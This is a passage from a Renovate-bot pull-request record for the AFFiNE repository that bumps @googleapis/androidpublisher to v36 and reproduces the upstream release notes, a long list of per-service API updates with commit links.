</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-03 18:33:32 +08:00
renovate[bot] eb32a5894e chore: bump up @googleapis/androidpublisher version to v36 (#15063)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@googleapis/androidpublisher](https://redirect.github.com/googleapis/google-api-nodejs-client) | [`^35.0.0` → `^36.0.0`](https://renovatebot.com/diffs/npm/@googleapis%2fandroidpublisher/35.1.1/36.0.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@googleapis%2fandroidpublisher/36.0.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@googleapis%2fandroidpublisher/35.1.1/36.0.0?slim=true) |

---

### Release Notes

<details>
<summary>googleapis/google-api-nodejs-client
(@googleapis/androidpublisher)</summary>

### [`v36.0.0`](https://redirect.github.com/googleapis/google-api-nodejs-client/blob/HEAD/CHANGELOG.md#13600-2024-05-02)

##### ⚠ BREAKING CHANGES

- **workloadmanager:** This release has breaking changes.
- **serviceusage:** This release has breaking changes.
- **servicenetworking:** This release has breaking changes.
- **serviceconsumermanagement:** This release has breaking changes.
- **securitycenter:** This release has breaking changes.
- **redis:** This release has breaking changes.
- **networkmanagement:** This release has breaking changes.
- **iam:** This release has breaking changes.
- **doubleclickbidmanager:** This release has breaking changes.
- **dns:** This release has breaking changes.
- **dataportability:** This release has breaking changes.
- **dataplex:** This release has breaking changes.
- **dataform:** This release has breaking changes.
- **contentwarehouse:** This release has breaking changes.
- **content:** This release has breaking changes.
- **compute:** This release has breaking changes.
- **beyondcorp:** This release has breaking changes.
- **alloydb:** This release has breaking changes.
- **aiplatform:** This release has breaking changes.

##### Features

- **accessapproval:** update the API
([88f6ef5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/88f6ef52f6b19a90962acb1604694da5e22af1d0))
- **admin:** update the API
([b6fff85](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6fff8553fc561f5c16d8bd46ded439bb793ea8a))
- **adsense:** update the API
([5349cf9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5349cf9808017b594380ade8c94aed81a3330ed2))
- **advisorynotifications:** update the API
([9c37105](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9c371058f141e1b30567a74d35245c0d116e9f02))
- **aiplatform:** update the API
([56cde03](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/56cde03e4eb6283561515ecac8435ad28f49dda9))
- **alertcenter:** update the API
([10d8698](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/10d869861c193788a3150515b2d8ec323517bc38))
- **alloydb:** update the API
([51ad37e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/51ad37ee97ac19ca26c26c645f39f8d9d3fde0cd))
- **analyticsadmin:** update the API
([8b4c314](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8b4c31451d3ace85c48b8a1170eac09024c518e0))
- **analyticshub:** update the API
([d06ce46](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d06ce46d020c92976660e2e9ee68f35f0e2da2f6))
- **androidmanagement:** update the API
([bb2dc2d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bb2dc2d1e3d99b2a27bfe9f1b517ab257cc886bf))
- **androidpublisher:** update the API
([f58a3c8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f58a3c8544b91d6cb987f2b72f200e7b79eabe14))
- **appengine:** update the API
([543b45e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/543b45e8cad0556e923f2f44e61d3bf96675e1ca))
- **apphub:** update the API
([e9a8db0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e9a8db0b264dc78e526dae22ff7a33574406a360))
- **artifactregistry:** update the API
([5a5e4aa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a5e4aae48f826b6daec0493c4cfe79b4b0dfa4a))
- **authorizedbuyersmarketplace:** update the API
([351c7ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/351c7edca745cf8d996963e6816811eaaca09a04))
- **backupdr:** update the API
([9796834](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/97968343e02bd85538961138f02ed20976f53a02))
- **beyondcorp:** update the API
([7f20c02](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7f20c0238728cae35a37e06b95e7dbb8cad57e2e))
- **bigqueryconnection:** update the API
([0e56135](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e56135413c3799c0543bb45510dede96970cb63))
- **bigquery:** update the API
([72b5d21](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/72b5d21ed11f1bcde638a1240c02d6ce03906844))
- **bigtableadmin:** update the API
([ad68d8c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ad68d8c6e175573ebd5c54ec74328386d9dc8cd3))
- **blockchainnodeengine:** update the API
([7f0503c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7f0503cc2cf3b7d7f90f0518a1deb592a4f313a4))
- **chat:** update the API
([0810516](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/081051658a22c7bf2cd8915838608f53fb620cd6))
- **cloudasset:** update the API
([4eb45be](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4eb45bed03811fb3f5c18967a0c7128ced2ee011))
- **cloudbuild:** update the API
([d20db7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d20db7be93195c69e6b1345bcf196aeab8b57b35))
- **clouddeploy:** update the API
([cd5014b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd5014bd87adbfbc2729f78f7d56bb4b8d42b7d7))
- **cloudsupport:** update the API
([ceb5503](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ceb5503e69b26a0838d8decc00ca17ebdcdda743))
- **compute:** update the API
([f84e98a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f84e98a33f39034e2cb7846fbc4c3fc6804a2ffa))
- **connectors:** update the API
([478d8c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/478d8c60beb0ccae9a89590f71802aa7843275e2))
- **contactcenteraiplatform:** update the API
([862d69b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/862d69b84cbbe5f9e6c34af4bfdfbe33990c9331))
- **contactcenterinsights:** update the API
([c1974c4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c1974c4b7385c84fdb70cd3c05e5ad601dbb4272))
- **container:** update the API
([8cd9863](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8cd986326583b69735627bae07263fad1595b7fb))
- **content:** update the API
([76546b8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/76546b866ac0e675f27b2b9ab1727f4c821c17ac))
- **contentwarehouse:** update the API
([aa28685](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/aa286853fecaa5d45d80e33e309ea388ea6ece97))
- **dataflow:** update the API
([ddd9231](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddd92315d9fff4a5a20493b1ce874f0974df3b82))
- **dataform:** update the API
([a43ddce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a43ddced989c08697f803f6d167f771ae27ecbcb))
- **datamigration:** update the API
([f0e692d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f0e692d9169793bc8abe3cd33982e36e04faf3ea))
- **dataplex:** update the API
([20e701c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/20e701c6dc51978418c70f58907d0d2c8d5d407d))
- **dataportability:** update the API
([50c5d63](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50c5d63f83ccf4e91e27e7322062a8edc24b33cf))
- **datastream:** update the API
([57a62ef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/57a62ef7920ab1ca1e18452b2749c3585a981736))
- **dialogflow:** update the API
([ddfc789](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddfc789b5c0c567d2ddc8241448e260bfb7ad20f))
- **discoveryengine:** update the API
([ec40fe5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec40fe54ac9bc032c370f8eaf436489a10b04159))
- **discovery:** update the API
([8d42dab](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8d42dab88214bc01e9a9678794b6015435b5071f))
- **displayvideo:** update the API
([90937cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/90937cda7d6475fd0f04ac2332f3351f53f08b22))
- **dlp:** update the API
([88f0a64](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/88f0a640104e95f5aa785b89658997746153915e))
- **dns:** update the API
([4688a5e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4688a5ef2114c8ffcc15890ee47949431915841c))
- **documentai:** update the API
([b07b1aa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b07b1aa83a3be53769729f43afe252bab824b55a))
- **domains:** update the API
([d34c2a0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d34c2a09071ea3431f88ce0b6be0757a9682f66e))
- **doubleclickbidmanager:** update the API
([0e6990d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e6990d73d7c576483a84b4dce75a5fd7fe3c0ad))
- **eventarc:** update the API
([0c28816](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0c2881683796bfbc7581c2b772ef6d630737ad02))
- **factchecktools:** update the API
([bd8d187](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd8d187f2fa9859b230c0292c509312b93fba7a5))
- **firestore:** update the API
([6d67fed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6d67fed98433e01900db319bc4747577cb6d6e3d))
- **games:** update the API
([99d63c1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/99d63c1ce9e7a141ce34ca9ab3b85e7c24413357))
- **gkebackup:** update the API
([e90fb98](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e90fb98d64548538cbb810258e9fde7b3f3561fc))
- **gkehub:** update the API
([d4c3244](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d4c3244d232a2788ef39e85a3ba451227446ebb2))
- **gmail:** update the API
([a4d9319](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a4d9319ad50bbfd9e27ed7b4ff865951b7dd1032))
- **iam:** update the API
([2e9117f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2e9117f73657e08bcea4de889f49bbeca4cb6882))
- **iap:** update the API
([db72cb3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/db72cb3acc75efc17df7dd0d6b4418e17c1c3c81))
- **logging:** update the API
([4317a72](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4317a72ef5752de222fafdaadb4be75267fedd4f))
- **marketingplatformadmin:** update the API
([ff87055](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ff8705570be84e5c2b93bac53dc6dc38923137ef))
- **metastore:** update the API
([57b1763](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/57b1763cd49724b461a5f85f8a6ef1cdebfdd500))
- **migrationcenter:** update the API
([3f91b3a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3f91b3abc6c81c7848e127563207299631cb1c7c))
- **monitoring:** update the API
([b601933](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6019332629f7f487a720bbedf58284f32bc84f2))
- **networkconnectivity:** update the API
([bb6e8ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bb6e8ffe0ccc87c117b7acbecf2ad9a52ec76158))
- **networkmanagement:** update the API
([3c9d201](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c9d20120e16a1c6df1c2cbac758d2fa28670c7b))
- **ondemandscanning:** update the API
([9efea7e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9efea7ec8fa03709a875f4e8131bcdf059ddd403))
- **orgpolicy:** update the API
([9abcb3a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9abcb3ab05e3f8ceac3d5f6fb77b69b6312d3d78))
- **paymentsresellersubscription:** update the API
([5c6228e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c6228e8693db8d5c3797148f0f547063beb23f1))
- **privateca:** update the API
([c8bed74](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c8bed74402e19d48227929a3c387663650c713fd))
- **pubsub:** update the API
([985ba9b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/985ba9bb35f3bd9db382497be3ec99d4c309cff4))
- **recaptchaenterprise:** update the API
([cd6af58](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd6af586c85f638a9e59647f9e14e13fbf4500c4))
- **redis:** update the API
([2896261](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/28962616def25002b1ab7eb995f220ba87646894))
- regenerate index files
([7cbd403](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7cbd403f5f44d43aa9fb86f35b4b71ff16bf8511))
- **retail:** update the API
([5c3af10](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c3af10dc0c01bcba9ac1dd306ece2641e576f66))
- **run:** update the API
([4adbdec](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4adbdec9d3771f3c024f978fab7897e547825b11))
- **searchads360:** update the API
([03ca122](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/03ca122fba8a0ae1bf3cb482aefefd17eeba6adf))
- **securitycenter:** update the API
([8b08aa2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8b08aa2ac1d8bb8eb264f8bda3089da60b4f4028))
- **serviceconsumermanagement:** update the API
([8878e94](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8878e945849f0c8a2946789f554aa8f7d43d9db5))
- **servicecontrol:** update the API
([763243a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/763243a5a56fbc735a259bc8a0cd16046a9b5289))
- **servicenetworking:** update the API
([d481dce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d481dce95d7f9f899d9b62f78933a731159f381c))
- **serviceusage:** update the API
([41b76ee](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/41b76ee8d6beeeb3bbccdcbbcd0853f610a54171))
- **sheets:** update the API
([74b2d05](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74b2d057117112b9b6991f70dc47ac60a9945e82))
- **spanner:** update the API
([2d2e0f6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d2e0f64b7ceb23e7695939c367d74c7ce14fc2b))
- **sqladmin:** update the API
([7cc6d5e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7cc6d5e1283e44228e54acf2bdb10bbe5436996c))
- **tpu:** update the API
([d6658ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d6658ff0af9efce119b420c5da8cfcab7b882276))
- **trafficdirector:** update the API
([69f9252](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/69f92522ff9920b35c5a07302f509f86c49485df))
- **verifiedaccess:** update the API
([33544fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/33544fca5d8da32c49b7c9a803e6f818cd71abcb))
- **workloadmanager:** update the API
([855fab4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/855fab42662185d828978f3474b6eba492f4b674))
- **workstations:** update the API
([867515f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/867515ff691803da59aac961866bb6afb224a642))
- **youtube:** update the API
([7452149](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7452149d3d70dd45b10ceff77310aa09b6c2c57d))

##### Bug Fixes

- **abusiveexperiencereport:** update the API
([dfd4aa1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/dfd4aa1e515b9665f2fcdf4a13eecd267b386895))
- **acceleratedmobilepageurl:** update the API
([9b0387c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9b0387c44997aab7f305900eee6fcb8801d3f7ee))
- **accesscontextmanager:** update the API
([413c833](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/413c833b3273a224f9df5fc36fae40669724e4fb))
- **acmedns:** update the API
([4199c73](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4199c734fcde97cd00126d4531c0acfe7f4aad9a))
- **addressvalidation:** update the API
([3c51f3f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c51f3f5214e6465f25825ee8f37a773bbc7b07e))
- **adexchangebuyer2:** update the API
([ec9384a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec9384ab02f3f30493962122c90c0549c318c7d4))
- **adexperiencereport:** update the API
([8932647](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8932647c6be056c97fff0754cf4198ae9b55e6bd))
- **admob:** update the API
([7b699f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7b699f5f9cc2f565811caf67a944eaa104d22efb))
- **adsensehost:** update the API
([e4373ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e4373ed0b695c995317e6f735542a228df2022e7))
- **analyticsdata:** update the API
([9c8dcf8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9c8dcf8f9aae5858d453a0dae64ca9837672bc87))
- **analyticsreporting:** update the API
([4b2a5bd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4b2a5bdaf8aca2a581fec1e7ee1f534eb9867dca))
- **analytics:** update the API
([f7f9cc4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f7f9cc4b9f2bf47aedd233ecdfb43531b5dad3cd))
- **androiddeviceprovisioning:** update the API
([47d89cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/47d89cda619cdec6b83e826913e1ff92e090ced8))
- **androidenterprise:** update the API
([293c247](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/293c247fbf83fbe9b54c14cd991b69bfd9679996))
- **apigateway:** update the API
([7d02f2d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7d02f2dae2c63f6cf62de73fc1d3e1381f9f7ce1))
- **apigeeregistry:** update the API
([f627870](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f62787095c2439b882896130c259cedb810114de))
- **apikeys:** update the API
([f2ab501](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f2ab50102415317c56bb20fb7c1894505c86a7e9))
- **area120tables:** update the API
([ba9d3e6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ba9d3e6258f47ea0d0bb3dae9f484a9097f2bdad))
- **assuredworkloads:** update the API
([3dc3798](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3dc3798f56c03f0cf7136eb5d5e625ef2c3c21ee))
- **batch:** update the API
([10727a4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/10727a4ccab11bd1203fa95cb14131a67804e7a5))
- **biglake:** update the API
([ebfd8c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ebfd8c6610f83f7ed63d21705f7d1eb2ed6db2d0))
- **bigquerydatapolicy:** update the API
([4871975](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/48719750b35826c4f147f8dc8601c90188dc8bee))
- **bigquerydatatransfer:** update the API
([05b9fc8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/05b9fc89e9f0b1b94092e50cef21b03044b836ba))
- **bigqueryreservation:** update the API
([9f226a3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9f226a3de413175cd44c76f45b19169010daaaa9))
- **billingbudgets:** update the API
([1190847](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1190847e882070097b0ef0fc74f23c5f162ecd16))
- **binaryauthorization:** update the API
([a5ad874](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a5ad874a862e827b55278bd56f25d6efbcc797c6))
- **blogger:** update the API
([285aa94](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/285aa9455d6afe92001fa4373c7a153124d9bf21))
- **books:** update the API
([b95f9af](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b95f9aff24842b3e2132f74913fb794699ea55be))
- **businessprofileperformance:** update the API
([92abfea](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/92abfea3a06b9714b650f6846469a434ff9d8c71))
- **calendar:** update the API
([a040e6d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a040e6d6ccbb5efbebd09db5e452e586072afc71))
- **certificatemanager:** update the API
([32dd53e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/32dd53e849a341afbd7f0f52548485167556f85d))
- **checks:** update the API
([37cb793](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/37cb793b61fbf605d4e94af20abbe6a75fab277d))
- **chromemanagement:** update the API
([2a9f611](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2a9f611d836a86cb36e0288ee13818238fac9a02))
- **chromepolicy:** update the API
([5f2b01b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5f2b01b222e12e7719296d6dbc885aa8b029c47b))
- **chromeuxreport:** update the API
([c7af220](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c7af220ffb1f7c5ee56a7e6ad0a87d9ff4c0e8a1))
- **civicinfo:** update the API
([74c8d7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74c8d7be47d07654832eca7a82ff54ab727e556a))
- **classroom:** update the API
([2183745](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2183745a478778c1009d91ab160f1546526c7746))
- **cloudbilling:** update the API
([f8baaac](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f8baaac306d170b837cf2eb544edae932d13ed98))
- **cloudchannel:** update the API
([a65c068](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a65c068d0595e90214d69be0ab74af66c80ad62d))
- **cloudcontrolspartner:** update the API
([5a7437b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a7437badd218eb3b92544397baa440040d2f3a6))
- **clouderrorreporting:** update the API
([4c557f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4c557f5a186799c1f4abe3b7afa3b1481f187b14))
- **cloudfunctions:** update the API
([fc21faf](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fc21faf20d3f7a4a70c035cea20fc36082a247b9))
- **cloudidentity:** update the API
([3d288c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3d288c674958a8ece72b1bb73764b9549b3cbc1c))
- **cloudkms:** update the API
([93e0687](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/93e06878abf84ad8b1df3f12ace0f067b1f25098))
- **cloudprofiler:** update the API
([d11e9e4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d11e9e41137ae8d062bd4ed084a350b0bde8d3c0))
- **cloudresourcemanager:** update the API
([76f0f51](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/76f0f511f97312e3aa7a41f14befa836ce44df55))
- **cloudscheduler:** update the API
([94305b7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/94305b7da4ccfab0e63b613d6a7fcbe33864270d))
- **cloudsearch:** update the API
([e6de73d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e6de73da3a7cf1c269ef6017843ccf6fd078f154))
- **cloudshell:** update the API
([f399b75](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f399b75d0d63674a28970f589aea6f01eab1577b))
- **cloudtasks:** update the API
([31dbbe2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/31dbbe2439fabe0f0fc1b8f3377a305fee87c2c0))
- **cloudtrace:** update the API
([212d697](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/212d697a0e2654ba1bb8f2775bf039b57be3a6cd))
- **composer:** update the API
([75304a0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/75304a070d61822ec87af425147acf2a3e72afdf))
- **config:** update the API
([07be765](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/07be7657dd18a230d4e2390f156263a98fdae02a))
- **containeranalysis:** update the API
([90afb7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/90afb7bddfde862f89ed2f599ca74bf8e2002e8c))
- **customsearch:** update the API
([dc6b156](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/dc6b156aaa9bcb1d45356db3c3a7058ed0720c04))
- **datacatalog:** update the API
([64c1abc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/64c1abc7e78bbe9a213c1c696a83389ca1b8d313))
- **datafusion:** update the API
([6aff1d8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6aff1d8ecad16691a2b9d5ab4b5bfacf2680c8a0))
- **datalabeling:** update the API
([797471f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/797471fb5f97302a1ab7f50587298aee650bf372))
- **datapipelines:** update the API
([e108596](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e10859679756d3c1fe243ade7b4ff096d4057f7a))
- **dataproc:** update the API
([abbcb61](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/abbcb618952a5c365ef553b83f88bd4fc6a19c68))
- **datastore:** update the API
([fe99c43](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fe99c436b00f3e0db1c048b6e1978c2c91eeaf75))
- **deploymentmanager:** update the API
([87fda2a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/87fda2a3b88f81077ed5f18f52e0263644ba19cb))
- **dfareporting:** update the API
([4cec666](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4cec666a18587527e4973548112080ccafaa9e37))
- **digitalassetlinks:** update the API
([abe8c25](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/abe8c25a24e1c1e521338d1ece3f8124c08ed686))
- **docs:** update the API
([5c28cc5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c28cc5f90c3ec07902952673a54a9439aebaefe))
- **domainsrdap:** update the API
([f3678df](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f3678df1b0f9621c9319be5c32b5c1ae0257409f))
- **doubleclicksearch:** update the API
([f6e9c9a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f6e9c9a07c6871be0b722532e09a1079fa2aa84d))
- **driveactivity:** update the API
([63563b6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/63563b6d89ccdb8a778089c48a649d212ae41187))
- **drivelabels:** update the API
([44db39e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/44db39ea335d5b3566c1f6a751f32eb159427c6a))
- **drive:** update the API
([5f88b3e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5f88b3e4deaa2aa30bc78df0e5c2e9e387e7d161))
- **essentialcontacts:** update the API
([6bc249f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6bc249f5d12c4975f3569ad735fe6b14875960a7))
- **fcmdata:** update the API
([da072ae](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/da072ae63e796156028c0b28863adfef9d1887b8))
- **fcm:** update the API
([c2043ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c2043ed711270a5e38a0842b539898e9d289f436))
- **file:** update the API
([4bbf0b9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4bbf0b92661f5ea47f09eefecf48238ab13980f1))
- **firebaseappcheck:** update the API
([851d463](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/851d4639bf75850c4ab88c1dad4dfd9166f9801b))
- **firebaseappdistribution:** update the API
([96163b7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/96163b73f732144c3da840b18d6a55aac62d6081))
- **firebasedatabase:** update the API
([3d96170](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3d96170cc795827c84a53e0c3d0de526a12b9d95))
- **firebasedynamiclinks:** update the API
([1122f63](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1122f63e79402abe5be53a38334c565ca883ad18))
- **firebasehosting:** update the API
([6abce84](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6abce84cf7567d906dc94c64700c8bc42c55de4a))
- **firebaseml:** update the API
([eef0dfe](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/eef0dfe82ab1c082959cdb168d9c8e438b98606b))
- **firebaserules:** update the API
([d02b49c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d02b49c84908b0757a6525665b9451092c0ee3dd))
- **firebasestorage:** update the API
([b303956](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b303956d395587471344b89bf546068d89b6b1a8))
- **firebase:** update the API
([38f0247](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/38f024730891a3e566ac49a18dd2786768f8fe10))
- **fitness:** update the API
([bd72df1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd72df18aba9c830b788a5ac4fd260ba693ce31d))
- **forms:** update the API
([e06cd96](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e06cd96538ce8a44d850c8cc29aabcdf0b180ab9))
- **gamesConfiguration:** update the API
([b26b164](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b26b16406b25d2cc66aeb21bbb4eb7d366c4f6ac))
- **gamesManagement:** update the API
([c056dbb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c056dbb47b86bf807f7a536281f4ec9f715b1b3b))
- **gkeonprem:** update the API
([50b340a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50b340ab8c56308486f8f47f15cf76c010300137))
- **gmailpostmastertools:** update the API
([2d1dd45](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d1dd456fd959314d4dfdd5066f32304ca6534a4))
- **groupsmigration:** update the API
